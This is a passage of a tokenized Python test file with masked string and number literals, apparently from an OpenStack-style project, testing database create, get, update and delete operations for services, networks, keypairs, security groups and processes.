'<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : True , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> expected = services [ : <NUM_LIT:2> ] <EOL> real = db . service_get_all_by_topic ( self . ctxt , '<STR_LIT>' ) <EOL> self . 
_assertEqualListsOfObjects ( expected , real ) <EOL> def test_service_get_all_by_host ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> expected = services [ : <NUM_LIT:2> ] <EOL> real = db . service_get_all_by_host ( self . ctxt , '<STR_LIT>' ) <EOL> self . _assertEqualListsOfObjects ( expected , real ) <EOL> def test_service_get_by_args ( self ) : <EOL> values = [ <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:a>' } , <EOL> { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:b>' } <EOL> ] <EOL> services = [ self . _create_service ( vals ) for vals in values ] <EOL> service1 = db . service_get_by_args ( self . ctxt , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> self . _assertEqualObjects ( services [ <NUM_LIT:0> ] , service1 ) <EOL> service2 = db . service_get_by_args ( self . ctxt , '<STR_LIT>' , '<STR_LIT:b>' ) <EOL> self . _assertEqualObjects ( services [ <NUM_LIT:1> ] , service2 ) <EOL> def test_service_get_by_args_not_found_exception ( self ) : <EOL> self . assertRaises ( exception . HostBinaryNotFound , <EOL> db . service_get_by_args , <EOL> self . ctxt , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> def test_service_binary_exists_exception ( self ) : <EOL> db . service_create ( self . ctxt , self . _get_base_values ( ) ) <EOL> values = self . _get_base_values ( ) <EOL> values . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . ServiceBinaryExists , db . service_create , <EOL> self . ctxt , values ) <EOL> def test_service_topic_exists_exceptions ( self ) : <EOL> db . service_create ( self . ctxt , self . 
_get_base_values ( ) ) <EOL> values = self . _get_base_values ( ) <EOL> values . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertRaises ( exception . ServiceTopicExists , db . service_create , <EOL> self . ctxt , values ) <EOL> class NetworksTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( NetworksTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> self . network_id = unicode ( uuid . uuid4 ( ) ) <EOL> self . neutron_network_id = unicode ( uuid . uuid4 ( ) ) <EOL> self . ext_router_id = unicode ( uuid . uuid4 ( ) ) <EOL> def test_networks_create ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> network = db . network_create ( self . ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( network , values , ignored_keys ) <EOL> def test_network_get_all ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> network_list = db . network_get_all ( self . ctxt , self . 
gid ) <EOL> for network in network_list : <EOL> self . assertEqual ( network [ "<STR_LIT>" ] , self . gid ) <EOL> def test_network_get_all_return_empty_list ( self ) : <EOL> network_list = db . network_get_all ( self . ctxt , self . gid ) <EOL> self . assertEqual ( network_list , [ ] ) <EOL> def test_network_get_by_network_id ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> values [ "<STR_LIT>" ] = self . network_id <EOL> db . network_create ( self . ctxt , values ) <EOL> network = db . network_get_by_network_id ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> self . assertEqual ( network [ "<STR_LIT>" ] , self . network_id ) <EOL> def test_network_get_by_network_id_exception_notfound ( self ) : <EOL> values = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> for i in range ( <NUM_LIT:1> - <NUM_LIT:5> ) : <EOL> values [ "<STR_LIT>" ] = "<STR_LIT>" + str ( i ) <EOL> db . network_create ( self . ctxt , values ) <EOL> self . assertRaises ( exception . NetworkNotFound , <EOL> db . network_get_by_network_id , <EOL> context = self . ctxt , <EOL> gid = self . gid , <EOL> network_id = self . 
network_id ) <EOL> def test_networks_update ( self ) : <EOL> create_values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> create_network = db . network_create ( self . ctxt , create_values ) <EOL> create_network [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> update_values = { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> db . network_update ( self . ctxt , self . network_id , update_values ) <EOL> network = db . network_get_by_network_id ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> ignored_keys = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . assertIsNotNone ( network [ "<STR_LIT>" ] ) <EOL> self . _assertEqualObjects ( network , create_network , ignored_keys ) <EOL> def test_network_delete ( self ) : <EOL> create_values = { <EOL> "<STR_LIT>" : self . network_id , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" + self . network_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> db . network_create ( self . ctxt , create_values ) <EOL> deleted_network = db . network_delete ( <EOL> self . ctxt , self . gid , self . network_id ) <EOL> self . assertEqual ( deleted_network [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> network_list = db . network_get_all ( self . ctxt , self . gid ) <EOL> self . 
assertEqual ( network_list , [ ] ) <EOL> PRIVATE_KEY = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class KeypairTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( KeypairTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> def _get_base_values ( self , gid ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : PRIVATE_KEY , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def _create_keypair ( self , gid , values ) : <EOL> v = self . _get_base_values ( gid ) <EOL> v . update ( values ) <EOL> return db . keypair_create ( self . 
user_ctxt , v ) <EOL> def test_keypair_get_all ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = [ <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> ] <EOL> keypairs = [ self . _create_keypair ( gid , value ) for value in values ] <EOL> expected_keypairs = db . keypair_get_all ( self . user_ctxt , gid ) <EOL> self . _assertEqualListsOfObjects ( keypairs , expected_keypairs ) <EOL> def test_keypair_get_by_keypair_id ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = [ <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> ] <EOL> keypairs = [ self . _create_keypair ( gid , value ) for value in values ] <EOL> expected = db . keypair_get_by_keypair_id ( <EOL> self . user_ctxt , gid , values [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> self . _assertEqualObjects ( keypairs [ <NUM_LIT:0> ] , expected ) <EOL> def test_keypair_get_keypair_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> db . keypair_create ( self . user_ctxt , values ) <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_get_by_keypair_id , <EOL> self . user_ctxt , gid , "<STR_LIT>" ) <EOL> def test_keypair_create ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . 
_assertEqualObjects ( keypair , values , ignored_keys ) <EOL> def test_keypair_update ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : False <EOL> } <EOL> keypair_after = db . keypair_update ( <EOL> self . user_ctxt , gid , keypair [ "<STR_LIT>" ] , values ) <EOL> self . assertEqual ( keypair_after [ "<STR_LIT>" ] , False ) <EOL> def test_keypair_update_keypair_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> keypair_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_update , <EOL> context = self . user_ctxt , <EOL> gid = gid , <EOL> keypair_id = keypair_id , <EOL> values = { } ) <EOL> def test_keypair_delete ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> keypair = db . keypair_create ( self . user_ctxt , values_before ) <EOL> keypair_after = db . keypair_delete ( <EOL> self . user_ctxt , gid , keypair [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , keypair_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( keypair_after . get ( "<STR_LIT>" ) ) <EOL> def test_keypair_delete_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> keypair_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . KeypairNotFound , <EOL> db . keypair_delete , <EOL> context = self . user_ctxt , <EOL> gid = gid , keypair_id = keypair_id ) <EOL> class SecuritygroupTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( SecuritygroupTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . 
RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> def _get_base_values ( self , gid , securitygroup_id = None ) : <EOL> return { <EOL> "<STR_LIT>" : securitygroup_id or "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : securitygroup_id or "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def test_securitygroup_get_all ( self ) : <EOL> group = self . _create_group ( "<STR_LIT>" ) <EOL> securitygroup_ids = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> securitygroups = [ ] <EOL> for securitygroup_id in securitygroup_ids : <EOL> securitygroup = db . securitygroup_create ( <EOL> self . user_ctxt , self . _get_base_values ( group [ "<STR_LIT>" ] , <EOL> securitygroup_id ) ) <EOL> securitygroups . append ( securitygroup ) <EOL> res_securitygroups = db . securitygroup_get_all ( context , group [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_securitygroups ) , len ( securitygroups ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( res_securitygroups ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_securitygroups [ i ] , securitygroups [ i ] , ignored_keys ) <EOL> def test_securitygroup_get_all_empty ( self ) : <EOL> res_securitygroups = db . securitygroup_get_all ( context , "<STR_LIT>" ) <EOL> expected = [ ] <EOL> self . 
assertEqual ( res_securitygroups , expected ) <EOL> def test_securitygroup_get_by_securitygroup_id ( self ) : <EOL> group = self . _create_group ( "<STR_LIT>" ) <EOL> securitygroup_ids = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> securitygroups = [ ] <EOL> for securitygroup_id in securitygroup_ids : <EOL> securitygroup = db . securitygroup_create ( <EOL> self . user_ctxt , self . _get_base_values ( group [ "<STR_LIT>" ] , <EOL> securitygroup_id ) ) <EOL> securitygroups . append ( securitygroup ) <EOL> res_securitygroup = db . securitygroup_get_by_securitygroup_id ( <EOL> self . user_ctxt , group [ "<STR_LIT>" ] , securitygroup_ids [ <NUM_LIT:0> ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( <EOL> res_securitygroup , securitygroups [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_securitygroup_get_by_securitygroup_id_not_found ( self ) : <EOL> try : <EOL> db . securitygroup_get_by_securitygroup_id ( <EOL> self . user_ctxt , "<STR_LIT>" , "<STR_LIT>" ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_securitygroup_create ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( securitygroup , values , ignored_keys ) <EOL> def test_securitygroup_update ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values_before ) <EOL> values = { <EOL> "<STR_LIT>" : False <EOL> } <EOL> securitygroup_after = db . securitygroup_update ( <EOL> self . user_ctxt , gid , securitygroup [ "<STR_LIT>" ] , values ) <EOL> self . 
assertEqual ( securitygroup_after [ "<STR_LIT>" ] , False ) <EOL> def test_securitygroup_update_securitygroup_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> securitygroup_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . SecuritygroupNotFound , <EOL> db . securitygroup_update , <EOL> context = self . user_ctxt , <EOL> gid = gid , <EOL> securitygroup_id = securitygroup_id , <EOL> values = { } ) <EOL> def test_securitygroup_delete ( self ) : <EOL> gid = "<STR_LIT>" <EOL> self . _create_group ( gid ) <EOL> values_before = self . _get_base_values ( gid ) <EOL> securitygroup = db . securitygroup_create ( self . user_ctxt , values_before ) <EOL> securitygroup_after = db . securitygroup_delete ( <EOL> self . user_ctxt , gid , securitygroup [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , securitygroup_after [ "<STR_LIT>" ] ) <EOL> self . assertIsNotNone ( securitygroup_after . get ( "<STR_LIT>" ) ) <EOL> def test_securitygroup_delete_not_found ( self ) : <EOL> gid = "<STR_LIT>" <EOL> securitygroup_id = "<STR_LIT>" <EOL> self . assertRaises ( exception . SecuritygroupNotFound , <EOL> db . securitygroup_delete , <EOL> context = self . user_ctxt , <EOL> gid = gid , securitygroup_id = securitygroup_id ) <EOL> class ProcessTestCase ( test . TestCase , ModelsObjectComparatorMixin ) : <EOL> def setUp ( self ) : <EOL> super ( ProcessTestCase , self ) . setUp ( ) <EOL> self . ctxt = context . get_admin_context ( ) <EOL> self . user_ctxt = context . RequestContext ( '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> self . gid = unicode ( uuid . uuid4 ( ) ) <EOL> self . group = self . _create_group ( self . gid ) <EOL> self . network = self . _create_network ( self . gid ) <EOL> self . keypair = self . _create_keypair ( self . gid ) <EOL> self . securitygroup = self . _create_securitygroup ( self . gid ) <EOL> def _get_base_values ( self ) : <EOL> return { <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . 
uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : self . keypair [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : self . gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : None , <EOL> "<STR_LIT>" : None <EOL> } <EOL> def _create_group ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . group_create ( self . user_ctxt , values ) <EOL> def _create_network ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . network_create ( self . user_ctxt , values ) <EOL> def _create_keypair ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : "<STR_LIT:test>" , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . keypair_create ( self . 
user_ctxt , values ) <EOL> def _create_securitygroup ( self , gid ) : <EOL> values = { <EOL> "<STR_LIT>" : gid , <EOL> "<STR_LIT>" : unicode ( uuid . uuid4 ( ) ) , <EOL> "<STR_LIT>" : self . user_ctxt . user_id , <EOL> "<STR_LIT>" : self . user_ctxt . project_id , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } <EOL> return db . securitygroup_create ( self . user_ctxt , values ) <EOL> def _create_process ( self , gid , create_count ) : <EOL> processes = [ ] <EOL> for i in range ( <NUM_LIT:0> , create_count ) : <EOL> process = db . process_create ( <EOL> self . user_ctxt , <EOL> self . _get_base_values ( ) , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> processes . append ( process ) <EOL> return processes <EOL> def _create_process_deleted ( self , gid , create_count ) : <EOL> processes = [ ] <EOL> process_base_value = self . _get_base_values ( ) <EOL> process_base_value [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:0> , create_count ) : <EOL> process = db . process_create ( <EOL> self . user_ctxt , <EOL> process_base_value , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> processes . append ( process ) <EOL> return processes <EOL> def test_process_get_all ( self ) : <EOL> processes = self . _create_process ( self . gid , <NUM_LIT:3> ) <EOL> res_processes = db . process_get_all ( context , self . gid ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertEqual ( len ( res_processes ) , len ( processes ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( res_processes ) ) : <EOL> self . _assertEqualObjects ( <EOL> res_processes [ i ] , processes [ i ] , ignored_keys ) <EOL> def test_process_get_all_empty ( self ) : <EOL> res_processes = db . process_get_all ( context , self . gid ) <EOL> expected = [ ] <EOL> self . 
assertEqual ( res_processes , expected ) <EOL> def test_process_get_by_pid ( self ) : <EOL> processes = self . _create_process ( self . gid , <NUM_LIT:3> ) <EOL> res_process = db . process_get_by_pid ( <EOL> self . user_ctxt , self . gid , processes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_process , processes [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_process_get_by_pid_get_deleted ( self ) : <EOL> processes = self . _create_process_deleted ( self . gid , <NUM_LIT:1> ) <EOL> res_process = db . process_get_by_pid ( <EOL> self . user_ctxt , self . gid , processes [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( res_process , processes [ <NUM_LIT:0> ] , ignored_keys ) <EOL> def test_process_get_by_pid_not_found ( self ) : <EOL> try : <EOL> db . process_get_by_pid ( self . user_ctxt , self . gid , "<STR_LIT>" ) <EOL> except Exception as e : <EOL> status_code = e . code <EOL> self . assertEqual ( status_code , <NUM_LIT> ) <EOL> def test_process_create ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> process = db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> values [ "<STR_LIT>" ] = [ self . network ] <EOL> values [ "<STR_LIT>" ] = [ self . securitygroup ] <EOL> ignored_keys = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _assertEqualObjects ( process , values , ignored_keys ) <EOL> def test_process_create_duplicated_network_id ( self ) : <EOL> values = self . _get_base_values ( ) <EOL> try : <EOL> db . process_create ( self . user_ctxt , <EOL> values , <EOL> [ self . network [ "<STR_LIT>" ] , <EOL> self . network [ "<STR_LIT>" ] ] , <EOL> [ self . securitygroup [ "<STR_LIT>" ] ] ) <EOL> except exception . 
